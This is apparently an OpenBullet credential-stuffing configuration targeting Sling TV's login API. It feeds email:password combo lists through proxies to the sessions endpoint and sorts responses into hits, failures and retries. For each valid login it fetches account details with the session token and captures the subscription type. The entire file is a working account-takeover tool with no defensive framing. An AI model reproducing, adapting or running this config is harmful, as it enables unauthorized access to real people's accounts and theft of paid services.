[SETTINGS]
{
  "Name": "Sling",
  "SuggestedBots": 100,
  "LastModified": "2018-06-20T22:53:16.8276104+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#post_login REQUEST POST "https://webapi-grn.p.sling.com/ums/v5/sessions?client_application=ottweb&format=json&locale=en" AutoRedirect=FALSE 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json;charset=UTF-8" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "x-fingerprint: C+0US1G|0A9312859323" 
  HEADER "referer: https://www.sling.com/signin?cvosrc=Indirect.Horizon.122015billboards&utm_medium=Indirect&utm_source=offline&utm_campaign=122015billboards" 
  HEADER "origin: https://www.sling.com" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "error" 
  KEYCHAIN Success OR 
    KEY "token" 
  KEYCHAIN Retry OR 
    KEY "Thank you for your interest." 
#token PARSE "<SOURCE>" JSON "token" Recursive=FALSE -> VAR "TOKEN" "" "" 
#get_details REQUEST GET "https://webapi-grn.p.sling.com/ums/v5/user/account_details?client_application=ottweb&format=json&locale=en&token=" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "x-fingerprint: C+0US1G|0A9312859323" 
  HEADER "x-jwt-authorization: Bearer <TOKEN>" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "lead" 
    KEY "cancelled" 
    KEY "expired" 
#subscriptions PARSE "<SOURCE>" JSON "freemium_identifiers" Recursive=FALSE -> CAP "SUBSCRIPTIONS" "" "" 
